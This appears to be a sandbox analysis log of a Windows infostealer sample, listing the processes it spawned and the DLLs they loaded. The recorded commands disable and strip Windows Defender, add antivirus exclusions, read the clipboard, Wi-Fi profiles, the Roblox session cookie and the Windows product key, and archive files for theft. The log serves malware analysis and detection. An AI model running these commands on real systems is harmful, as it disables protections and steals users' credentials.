              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64-encoded command omitted]
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64-encoded command omitted]
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF89E.tmp" "c:\Users\user\AppData\Local\Temp\3lfchnc2\CSC30375EB9C2504D3B856F38EEC7AAE920.TMP"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: python3.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: libffi-8.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: sqlite3.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: libcrypto-1_1.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: libssl-1_1.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: dciman32.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: mmdevapi.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: ksuser.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: avrt.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: audioses.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: midimap.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
